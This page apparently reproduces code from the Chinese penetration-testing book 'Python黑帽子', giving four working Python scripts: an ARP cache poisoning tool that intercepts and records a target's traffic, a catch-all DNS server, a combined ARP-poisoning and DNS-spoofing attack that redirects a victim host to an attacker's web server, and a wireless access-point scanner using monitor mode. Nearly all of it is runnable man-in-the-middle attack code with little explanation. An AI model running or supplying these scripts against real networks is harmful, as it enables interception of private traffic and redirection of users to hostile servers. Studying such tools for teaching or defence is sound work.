《Python黑帽子:黑客与渗透测试编程之道》 Scapy:网络的掌控者

时间:2022-07-08 18:11:39

利用Scapy进行ARP缓存投毒

#!/usr/bin/python
#coding=utf-8
from scapy.all import *
import os
import sys
import threading
import signal
import time

# Set by the main thread to ask the poisoning thread to stop.  A flag is
# required because KeyboardInterrupt is only ever raised in the main thread,
# so a worker thread cannot rely on catching it.
stop_poisoning = threading.Event()


def restore_target(gateway_ip, gateway_mac, target_ip, target_mac):
    """Re-announce the real IP/MAC pairings of the gateway and the target.

    Five broadcast ARP replies are sent for each of the two hosts.  Unlike
    the earlier revision, this function no longer sends SIGINT to its own
    process: shutdown is coordinated by the caller through
    ``stop_poisoning``, which avoids a second KeyboardInterrupt being raised
    while the script is already cleaning up.
    """
    print("[*] Restoring target... ")
    send(ARP(op=2, psrc=gateway_ip, pdst=target_ip,
             hwdst="ff:ff:ff:ff:ff:ff", hwsrc=gateway_mac), count=5)
    send(ARP(op=2, psrc=target_ip, pdst=gateway_ip,
             hwdst="ff:ff:ff:ff:ff:ff", hwsrc=target_mac), count=5)


def get_mac(ip_address):
    """Return the MAC address that answers an ARP request for *ip_address*.

    Returns None when no reply arrives within the timeout/retry budget.
    """
    responses, unanswered = srp(
        Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip_address),
        timeout=2, retry=10)
    # Use the source MAC of the first reply received.
    for sent, received in responses:
        return received[Ether].src
    return None


def poison_target(gateway_ip, gateway_mac, target_ip, target_mac):
    """Send forged ARP replies every two seconds until asked to stop.

    The loop ends when ``stop_poisoning`` is set.  KeyboardInterrupt is still
    handled for the case where this function is run in the main thread.
    """
    target_pkt = ARP()
    target_pkt.op = 2
    target_pkt.psrc = gateway_ip
    target_pkt.pdst = target_ip
    target_pkt.hwdst = target_mac

    gateway_pkt = ARP()
    gateway_pkt.op = 2
    gateway_pkt.psrc = target_ip
    gateway_pkt.pdst = gateway_ip
    gateway_pkt.hwdst = gateway_mac

    print("[*] Beginning the ARP poison. [CTRL-C to stop]")

    try:
        while not stop_poisoning.is_set():
            send(target_pkt)
            send(gateway_pkt)
            # Event.wait doubles as an interruptible two-second sleep.
            stop_poisoning.wait(2)
    except KeyboardInterrupt:
        restore_target(gateway_ip, gateway_mac, target_ip, target_mac)

    print("[*] ARP poison attack finished. ")
    return


interface = "eth0"
target_ip = "10.10.10.134"    # host under test
gateway_ip = "10.10.10.2"     # gateway
packet_count = 1000           # number of packets to capture

# Interface used for sniffing
conf.iface = interface
# Silence scapy's own output
conf.verb = 0

print("[*] Setting up %s" % interface)

gateway_mac = get_mac(gateway_ip)
if gateway_mac is None:
    print("[!!!] Failed to get gateway MAC. Exiting. ")
    sys.exit(0)
else:
    print("[*] Gateway %s is at %s" % (gateway_ip, gateway_mac))

target_mac = get_mac(target_ip)
if target_mac is None:
    print("[!!!] Failed to get target MAC. Exiting. ")
    sys.exit(0)
else:
    print("[*] Target %s is at %s" % (target_ip, target_mac))

# Start the ARP poisoning thread
poison_thread = threading.Thread(
    target=poison_target,
    args=(gateway_ip, gateway_mac, target_ip, target_mac))
poison_thread.start()

try:
    print("[*] Starting sniffer for %d packets" % packet_count)
    bpf_filter = "ip host %s" % target_ip
    packets = sniff(count=packet_count, filter=bpf_filter, iface=interface)
    # Write the captured packets to a file
    wrpcap('arper.pcap', packets)
except KeyboardInterrupt:
    pass
finally:
    # Stop the worker first so that the restore is not overwritten by a
    # further round of forged replies, then put the network back.
    stop_poisoning.set()
    poison_thread.join()
    restore_target(gateway_ip, gateway_mac, target_ip, target_mac)
sys.exit(0)

Python DNS 服务器实现

import socketserver,struct

class SinDNSQuery:
    """Question section (QNAME, QTYPE, QCLASS) of a DNS message."""

    def __init__(self, data):
        """Parse the first question from *data* (the bytes after the header).

        Raises ValueError when the name is truncated or uses a label form
        that is not a plain length-prefixed label, and struct.error when the
        type/class fields are missing.
        """
        labels = []
        pos = 0
        while True:
            if pos >= len(data):
                raise ValueError("truncated DNS question name")
            length = data[pos]
            if length == 0:
                break
            # Plain labels are at most 63 bytes; the two high bits mark
            # compression pointers / reserved forms, which are not handled.
            if length & 0xC0:
                raise ValueError("unsupported label type in DNS question")
            label = data[pos + 1:pos + 1 + length]
            if len(label) != length:
                raise ValueError("truncated DNS question label")
            # latin-1 maps each byte to the same code point chr() would.
            labels.append(label.decode('latin-1'))
            pos += 1 + length
        self.name = '.'.join(labels)
        # Raw encoded name including the terminating zero byte.
        self.querybytes = data[0:pos + 1]
        (self.type, self.classify) = struct.unpack('>HH', data[pos + 1:pos + 5])
        self.len = pos + 5

    def getbytes(self):
        """Return the question re-encoded as wire bytes."""
        return self.querybytes + struct.pack('>HH', self.type, self.classify)


class SinDNSAnswer:
    """A single A-record answer pointing at *ip*."""

    def __init__(self, ip):
        self.name = 49164        # 0xC00C: compression pointer to offset 12
        self.type = 1
        self.classify = 1
        self.timetolive = 190
        self.datalength = 4
        self.ip = ip

    def getbytes(self):
        """Return the answer record as wire bytes."""
        res = struct.pack('>HHHLH', self.name, self.type, self.classify,
                          self.timetolive, self.datalength)
        octets = [int(part) for part in self.ip.split('.')]
        return res + struct.pack('BBBB', octets[0], octets[1], octets[2], octets[3])


class SinDNSFrame:
    """A DNS message consisting of the header, one question and an optional answer."""

    def __init__(self, data):
        (self.id, self.flags, self.quests, self.answers, self.author,
         self.addition) = struct.unpack('>HHHHHH', data[0:12])
        self.query = SinDNSQuery(data[12:])

    def getname(self):
        """Return the queried domain name."""
        return self.query.name

    def setip(self, ip):
        """Turn this frame into a response that answers with *ip*."""
        self.answer = SinDNSAnswer(ip)
        self.answers = 1
        self.flags = 33152       # 0x8180

    def getbytes(self):
        """Serialize the header, the question and (if set) the answer.

        Authority and additional sections are never written, so their
        counts are emitted as zero regardless of what the query carried;
        echoing the query's counts would describe records that are absent.
        """
        res = struct.pack('>HHHHHH', self.id, self.flags, self.quests,
                          self.answers, 0, 0)
        res = res + self.query.getbytes()
        if self.answers != 0:
            res = res + self.answer.getbytes()
        return res


class SinDNSUDPHandler(socketserver.BaseRequestHandler):
    """Answer A queries from SinDNSServer.namemap; echo everything else."""

    def handle(self):
        # The datagram is binary: it must not be stripped, otherwise a
        # transaction ID beginning with a whitespace byte gets corrupted.
        data = self.request[0]
        sock = self.request[1]
        try:
            dns = SinDNSFrame(data)
        except (struct.error, ValueError):
            # Malformed or unsupported packet: drop it.
            return
        namemap = SinDNSServer.namemap
        if dns.query.type == 1:
            name = dns.getname()
            if name in namemap:
                dns.setip(namemap[name])
                sock.sendto(dns.getbytes(), self.client_address)
            elif '*' in namemap:
                dns.setip(namemap['*'])
                sock.sendto(dns.getbytes(), self.client_address)
            else:
                sock.sendto(data, self.client_address)
        else:
            sock.sendto(data, self.client_address)
        print(self.client_address)


class SinDNSServer:
    """Small UDP DNS server backed by a name -> IPv4 address table."""

    def __init__(self, port=53):
        # The table lives on the class so that the handler can reach it.
        SinDNSServer.namemap = {}
        self.port = port

    def addname(self, name, ip):
        """Map *name* (or '*' as a catch-all) to *ip*."""
        SinDNSServer.namemap[name] = ip

    def start(self):
        """Bind on all interfaces and serve until interrupted."""
        HOST, PORT = "0.0.0.0", self.port
        server = socketserver.UDPServer((HOST, PORT), SinDNSUDPHandler)
        try:
            server.serve_forever()
        finally:
            server.server_close()


if __name__ == "__main__":
    server = SinDNSServer()
    server.addname('www.lyshark.com', '192.168.1.20')
    server.addname('*', '192.168.1.20')
    server.start()

DNS欺骗之欺骗代码

import sys
import os
import threading
from scapy.all import *
from optparse import OptionParser #DNS欺骗函数
def DNS_Spoof(data):
    """Sniff callback: reply to a captured DNS query with the address in ``jokers``.

    Packets that are not IPv4/UDP DNS queries carrying a question are
    ignored.  A failure while handling one packet is reported and the
    sniffer keeps running; previously any exception called sys.exit(), which
    silently ended the sniffing thread after the first problem packet.
    """
    if not (data.haslayer(DNS) and data.haslayer(IP) and data.haslayer(UDP)):
        return
    dns = data[DNS]
    if dns.qr != 0 or not dns.qd:
        return
    try:
        qname = dns.qd.qname
        # Build the DNS answer record
        dns_an = DNSRR(rrname=qname, rdata=jokers)
        # Build the IP/UDP envelope, mirroring the query's addresses and port
        repdata = IP(src=data[IP].dst, dst=data[IP].src) / UDP(dport=data[UDP].sport, sport=53)
        # Build the DNS payload
        repdata /= DNS(id=dns.id, qd=dns.qd, qr=1, an=dns_an)
        # The name may be bytes (Python 3); decode it so that the string
        # concatenation below cannot raise before the reply is sent.
        qname_text = qname if isinstance(qname, str) else qname.decode('utf-8', 'replace')
        # Report what is being answered
        print('\nhancker ip :' + jokers + " url : " + qname_text)
        # Send the reply
        send(repdata)
    except Exception as err:
        print(err)


# DNS spoofing function
def DNS_S(dns_ip, iface):
    """Record *dns_ip* as the spoofed answer and sniff DNS queries on *iface*.

    The address is published through the module-level ``jokers`` variable,
    which DNS_Spoof reads.  This call blocks for as long as sniff() runs.
    """
    global jokers
    jokers = dns_ip
    print("DNS欺骗开始!")
    # store=0: packets are handled by the callback only; keeping every
    # sniffed packet in memory would grow without bound on a long run.
    sniff(prn=DNS_Spoof, filter='udp dst port 53', iface=iface, store=0)


# ARP spoofing function
def op(eths, mubiao_ip, gateway_ip):
    """Repeatedly send the target an ARP reply that maps the gateway IP to this host's MAC.

    eths is the interface name, mubiao_ip the target host and gateway_ip
    the gateway.  sendp() is called with loop=1, so this blocks until it
    fails or is interrupted.
    """
    # MAC address of the target device
    target_mac = getmacbyip(mubiao_ip)
    if target_mac is None:
        # Unresolvable target: report it instead of building a frame whose
        # destination is the literal string 'None'.
        print("目标ARP数据发送失败!")
        return
    target_mac = str(target_mac)
    # MAC address of this machine
    self_mac = str(get_if_hwaddr(eths))
    # Build the Ethernet frame
    frame = Ether(src=self_mac, dst=target_mac) / ARP(
        op=2, hwsrc=self_mac, psrc=gateway_ip, hwdst=target_mac, pdst=mubiao_ip)
    try:
        # sendp transmits at layer 2 of the OSI model
        sendp(frame, inter=2, iface=eths, loop=1)
    except Exception as e:
        print("目标ARP数据发送失败!")


def wifi(eths, mubiao_ip, gateway_ip, dns_ip):
    """Start the DNS spoofing thread, then repeatedly send a forged ARP reply to the gateway.

    The DNS thread is started regardless of whether the gateway's MAC can
    be resolved, matching the previous ordering of side effects.
    """
    # Resolve the gateway's MAC from its IP
    gateway_mac = getmacbyip(gateway_ip)
    # MAC of the local interface
    self_mac = get_if_hwaddr(eths)
    # New thread: start DNS spoofing
    t3 = threading.Thread(target=DNS_S, args=(dns_ip, eths))
    t3.daemon = True
    t3.start()
    if gateway_mac is None:
        print("网关ARP数据发送失败!")
        return
    # Build the Ethernet frame and the ARP reply.  The ARP source pairs a
    # non-existent MAC address with the correct IP so that resolution fails
    # in both directions.  The ARP op field is the operation: 2 = reply,
    # 1 = request.
    frame = Ether(src=self_mac, dst=gateway_mac) / ARP(
        op=2, hwsrc='12:1a:13:a3:13:ef', psrc=mubiao_ip, hwdst=gateway_mac, pdst=gateway_ip)
    try:
        sendp(frame, inter=2, iface=eths, loop=1)
    except Exception as e:
        print("网关ARP数据发送失败!")


def main():
    """Start both ARP threads and keep the main thread alive."""
    import time

    try:
        eth = "Realtek PCIe GBE Family Controller"  # interface name
        mubiao = "192.168.1.8"    # target host
        gateway = "192.168.1.1"   # gateway
        dip = "192.168.1.20"      # address of the apache server
        t1 = threading.Thread(target=op, args=(eth, mubiao, gateway))
        t1.daemon = True
        t1.start()
        t2 = threading.Thread(target=wifi, args=(eth, mubiao, gateway, dip))
        t2.daemon = True
        t2.start()
    except Exception as e:
        print(e)
        sys.exit(1)
    # The workers are daemon threads, so the main thread has to stay alive.
    # Sleep instead of spinning so that this does not occupy a CPU core.
    while True:
        time.sleep(1)


if __name__ == '__main__':
    main()

无线网嗅探

#coding=utf-8

import os
import sys
import subprocess
from scapy.all import *

RSN = 48    # management-frame information element (Dot11Elt) ID 48 carries RSN info
WPA = 221   # management-frame information element ID 221 carries WPA info
Dot11i = {0: 'GroupCipher',
          1: 'WEP-40',
          2: 'TKIP',
          4: 'CCMP',
          5: 'WEP-104'
          }  # 6th byte of the RSN info
WPA_Auth = {1: '802.11x/PMK',
            2: 'PSK'
            }  # 22nd byte of the RSN info
DN = open(os.devnull, 'w')


def get_wlan_interfaces():
    '''
    Return the wireless interfaces of this machine grouped by mode.

    The result is a dict with the keys 'monitor', 'managed' and 'all', each
    holding a list of interface names parsed from `iwconfig` output.  Exits
    the program when no wireless interface is found.
    '''
    interfaces = {'monitor': [], 'managed': [], 'all': []}
    # universal_newlines=True yields text on both Python 2 and Python 3, so
    # the string operations below work on either.
    proc = subprocess.Popen(['iwconfig'], stdout=subprocess.PIPE, stderr=DN,
                            universal_newlines=True)
    for line in proc.communicate()[0].split('\n'):
        # An interface entry starts in the first column; indented lines
        # continue the previous entry.
        if not line or line[0] == ' ':
            continue
        iface = line.split(' ')[0]
        if 'Mode:Monitor' in line:
            interfaces['monitor'].append(iface)
        if 'IEEE 802.11' in line:
            interfaces['managed'].append(iface)
        interfaces['all'].append(iface)
    if not interfaces['managed']:
        sys.exit('[!]没有无线网卡,请插入网卡')
    return interfaces


interfaces = get_wlan_interfaces()  # wireless interfaces present at start-up


def get_strongest_inface():
    '''
    Return the interface whose `iwlist <dev> scan` reports the most APs,
    using the AP count as a proxy for the strongest card.
    '''
    iface_APs = []
    for iface in interfaces['managed']:
        if iface:
            proc = subprocess.Popen(['iwlist', iface, 'scan'],
                                    stdout=subprocess.PIPE, stderr=DN,
                                    universal_newlines=True)
            lines = proc.communicate()[0].split('\n')
            count = sum(1 for line in lines if '- Address:' in line)
            iface_APs.append((count, iface))
    interface = max(iface_APs)[1]
    return interface


def start_monitor_mode():
    '''
    Return the name of an interface in monitor mode, starting one with
    airmon-ng when none exists yet.  Exits the program on failure.
    '''
    if interfaces['monitor']:
        print('[*]监听网卡为:%s' % interfaces['monitor'][0])
        return interfaces['monitor'][0]
    interface = get_strongest_inface()
    print('[*]网卡%s开启监听模式...' % interface)
    try:
        # Argument list rather than a shell string: the interface name is
        # passed verbatim and never interpreted by a shell.
        subprocess.call(['/usr/sbin/airmon-ng', 'start', interface])
        moni_inface = get_wlan_interfaces()['monitor']
        print('[*]监听网卡为:%s' % moni_inface[0])
        # Return a single name, as the early-return path above does
        # (the whole list used to be returned here).
        return moni_inface[0]
    except Exception:
        sys.exit('[!]无法开启监听模式')


def get_AP_info(pkt):
    '''
    Extract SSID, BSSID, channel and encryption info from a Dot11 packet.

    Returns a one-entry dict: {addr2: [first-element info, channel, ...]},
    with the auth and cipher names appended when get_Dot11_RSN finds both.
    '''
    AP_info = {}
    # Info of the first Dot11Elt - presumably the SSID element; the variable
    # used to be called "bssid".
    network_name = pkt[Dot11][Dot11Elt].info
    # Transmitter address - presumably the BSSID for beacon/probe-response
    # frames; the variable used to be called "ssid".
    ap_address = pkt[Dot11].addr2
    # NOTE(review): the [:3] slice appears to select the third layer from the
    # first Dot11Elt, presumably the channel element - confirm.
    chanle = str(ord(pkt[Dot11][Dot11Elt][:3].info))
    AP_infos = [network_name, chanle]
    wpa_info, cipher_info = get_Dot11_RSN(pkt)
    if wpa_info and cipher_info:
        AP_infos = AP_infos + [wpa_info, cipher_info]
    AP_info[ap_address] = AP_infos
    return AP_info


APs_info = {}
def get_APs_info(pkt):
    '''
    Record the AP described by *pkt* (beacon or probe response) in the
    module-level APs_info dict, keeping the first entry seen for each key,
    and return that dict.  Other packets leave the dict unchanged.
    '''
    if pkt.haslayer(Dot11) and (pkt.haslayer(Dot11Beacon) or pkt.haslayer(Dot11ProbeResp)):
        AP_info = get_AP_info(pkt)
        # setdefault replaces dict.has_key()/keys()[0], which exist only on
        # Python 2; an already-known AP is left untouched, as before.
        for ap_key, details in AP_info.items():
            APs_info.setdefault(ap_key, details)
    return APs_info


# Keys of the access points that show_APs_info has already printed.
already_shows = []
def show_APs_info(pkt):
    '''
    Sniff callback: print every access point that has not been shown yet.

    The table returned by get_APs_info is keyed by the frame's addr2
    address; value[0] is the info of the first information element.  The
    two labels below used to be swapped relative to that data.
    '''
    APs_info = get_APs_info(pkt)
    for (key, value) in APs_info.items():
        if key in already_shows:
            continue
        already_shows.append(key)
        print('-' * 40)
        print(' [+]AP的BSSID:%s' % key)
        print(' [+]AP的SSID:%s' % value[0])
        print(' [+]AP当前的chanle:%s' % value[1])
        if len(value) == 4:
            print(' [+]AP的认证方式为:%s' % value[2])
            print(' [+]AP的加密算法为:%s' % value[3])
        else:
            print(' [+]开放验证!!')
        print('-' * 40)


def get_Dot11_RSN(pkt):
    '''
    Get the cipher and auth info from a Beacon or ProbeResponse frame.

    Returns (auth name, cipher name) from the first RSN element whose
    values are both known, otherwise (None, None).
    '''
    # Walk the chain of information elements directly.  The earlier code
    # derived the element count from summary().split('/'), which could
    # index past the last layer and raise outside its try block.
    elt = pkt.getlayer(Dot11Elt)
    while isinstance(elt, Dot11Elt):
        if elt.ID == RSN:
            try:
                # Hex part only, lower-cased, so the 'ac' search cannot be
                # affected by the ASCII column or by upper-case hex output.
                RSN_info = hexstr(elt.info, onlyhex=1).lower()
                # the '02' of the first "00 0f ac 02" is the cipher
                cipher_index = RSN_info.find('ac')
                # the '02' of the last "00 0f ac 02" is the auth type
                auth_index = RSN_info.rfind('ac')
                cipher_num = int(RSN_info[(cipher_index + 3):(cipher_index + 5)], 16)
                auth_num = int(RSN_info[(auth_index + 3):(auth_index + 5)], 16)
            except Exception:
                # Best effort: an element that cannot be parsed is skipped.
                pass
            else:
                cipher_info = Dot11i.get(cipher_num)
                wpa_info = WPA_Auth.get(auth_num)
                if cipher_info is not None and wpa_info is not None:
                    return wpa_info, cipher_info
        elt = elt.payload
    return None, None


def sniffering(interface, action):
    '''
    Sniff 5000 packets on *interface*, passing each one to *action*.
    '''
    print('[*]附近AP信息如下:')
    sniff(iface=interface, prn=action, count=5000, store=0)


def main():
    '''Put an interface into monitor mode and list the nearby APs.'''
    moni_inface = start_monitor_mode()
    sniffering(moni_inface, show_APs_info)


if __name__ == '__main__':
    main()